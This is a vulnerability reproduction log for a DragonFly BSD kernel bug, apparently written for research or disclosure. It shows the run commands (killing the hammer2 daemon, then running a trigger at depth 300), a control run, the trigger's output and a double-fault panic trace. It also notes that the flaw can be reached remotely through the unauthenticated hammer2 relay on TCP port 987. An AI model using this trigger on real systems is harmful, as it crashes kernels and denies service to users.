============================================================ DF-0017 — DECISIVE RUN LOG (full, untrimmed) ============================================================ Guest: DragonFly v6.5.0.1712.g89e6a-DEVELOPMENT (master DEV, X86_64_GENERIC) Setup: /boot/loader.conf has console="comconsole" so the kernel panic + DDB backtrace land on the QEMU serial line (dfbsd-qemu/boot.log), because the default vidconsole is headless (-display none). PRECONDITION (resolved the prior "inconclusive" blocker): The hammer2 userland cluster daemon (pid 68, "hammer2: hammer2 autoconn_thread") connects every disk's DMSG iocom at boot via DIOCRECLUSTER (sbin/hammer2/cmd_service.c:898), leaving each disk iocom's reader thread blocked in fp_read() on a pipe to the daemon. kdmsg_iocom_reconnect() (sys/kern/kern_dmsg.c:141) then deadlocks waiting for that stuck reader to exit. Killing the daemon breaks the pipes, the readers get EOF and exit, msgrd_td becomes NULL, and a fresh DIOCRECLUSTER then succeeds. (Root fs hammer2 mount has its own kernel iocom and is unaffected by killing the userland daemon.) => run.sh performs: pkill -9 -x hammer2 ; sleep 2 ; ./trigger 300 ============================================================ CONTROL RUN: depth=5 (shallow chain -- must NOT overflow) ============================================================ $ ./trigger 5 [1] opened /dev/vbd0 fd=3 [2] socketpair sv[4,5] [2a] creating drain thread [2b] drain thread started [2c] issuing DIOCRECLUSTER (recl.fd=4)... [3] DIOCRECLUSTER ok [*] DMSG iocom attached; sending 5 chained CREATEs + root DELETE [4] wrote 5 CREATEs [5] wrote DELETE root (rv=64); waiting for panic... [6] survived sleep(3); closing sv[1] to trigger EOF path [7] survived; no panic observed TRIGGER_EXIT=0 Guest: up. dmesg: clean (no panic/fault/kdmsg warnings). => depth=5 does NOT panic. Confirms the panic is depth/recursion-driven. ============================================================ PANIC RUN: depth=300 (deep chain -- overflows 16 KB stack) ============================================================ $ ./trigger 300 [1] opened /dev/vbd0 fd=3 [2] socketpair sv[4,5] [2a] creating drain thread [2b] drain thread started [2c] issuing DIOCRECLUSTER (recl.fd=4)... [3] DIOCRECLUSTER ok [*] DMSG iocom attached; sending 300 chained CREATEs + root DELETE <<< guest PANICKED here (ssh died mid-run; remaining buffered stdout lost) >>> --- guest status: down (frozen in DDB) --- --- panic captured on serial console (dfbsd-qemu/boot.log): --- login: DOUBLE FAULT Fatal double fault rip = 0xffffffff806564d4 rsp = 0xfffff800ab38f000 rbp = 0xfffff800ab38f000 cpuid = 1; lapic id = 1 panic: double fault cpuid = 1 Trace beginning at frame 0xfffff8004602eec8 dblfault_handler() at dblfault_handler+0x10c 0xffffffff80bd5f3c dblfault_handler() at dblfault_handler+0x10c 0xffffffff80bd5f3c Debugger("panic") CPU1 stopping CPUs: 0x00000001 stopped Stopped at Debugger+0x7c: movb $0,0xbd77f9(%rip) db> => depth=300 PANICS with a kernel-stack-overflow double fault. Reproducible (identical signature on a 2nd fresh reset run; see panic.txt). Guest must be reset via `vm.sh reset`. ============================================================ CONCLUSION ============================================================ REPRODUCED. Unbounded recursion in kdmsg_simulate_failure() / kdmsg_state_dying() (sys/kern/kern_dmsg.c:1346 / :1428) overflows the 16 KB LWKT kernel thread stack when a DMSG peer builds a deep circuit chain (>= ~hundreds of CREATE messages) and teardown is driven. Result: guaranteed kernel panic (double fault) -> full-system DoS. No guard page on the LWKT stack, so it is also an (uncontrolled) kernel memory- corruption primitive. Reachable locally via DIOCRECLUSTER (root / operator) or remotely via the unauthenticated HAMMER2 cluster relay (the hammer2 daemon listens on TCP 987 and relays peer DMSG traffic into the kernel disk iocom; LNK_AUTH is unimplemented and receive-side CRC is not verified).